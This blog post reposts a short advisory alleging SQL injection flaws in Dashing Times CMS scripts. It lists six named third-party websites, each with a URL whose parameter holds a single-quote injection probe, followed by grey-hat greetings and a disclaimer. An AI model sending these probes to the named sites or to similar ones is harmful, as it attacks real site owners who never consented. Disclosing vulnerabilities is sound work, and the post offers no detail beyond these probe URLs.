Monday, October 20, 2014

Dashing Times SQL Injection





source : 
http://packetstormsecurity.com/files/127961/Dashing-Times-SQL-Injection.html





##################################################################################                                
dashing times cms scripts, sql injection vulnerability.
products page: http://www.dashingtimes.in/portfolio/
author(pentester): 3spi0n
on social: twitter.com/eyyamgudeer
##################################################################################

[description] 

i found vulnerability all cms scripts of dashingtimes web design.


[some weak websites] 

[+] (categories.php, catid param)
>>> http://gayatrifashions.com/categories.php?catId='24

[+] (index.php, id param)
>>> http://skglassmachines.com/index.php?id='2
>>> http://mithasgroup.net/overview/index.php?id='24

[+] (page.php, id param)
>>> http://igsecurityindia.com/page.php?id='2
>>> http://rainbow-group.co.in/page.php?id='2
>>> http://sshousekeepingservices.com/page.php?id='10

##################################################################################
and greetings, grayhats and janissaries.
"since 2008, espion."
##################################################################################

0 komentar:

Post a Comment

I just a newbie and student, don't using this article for criminal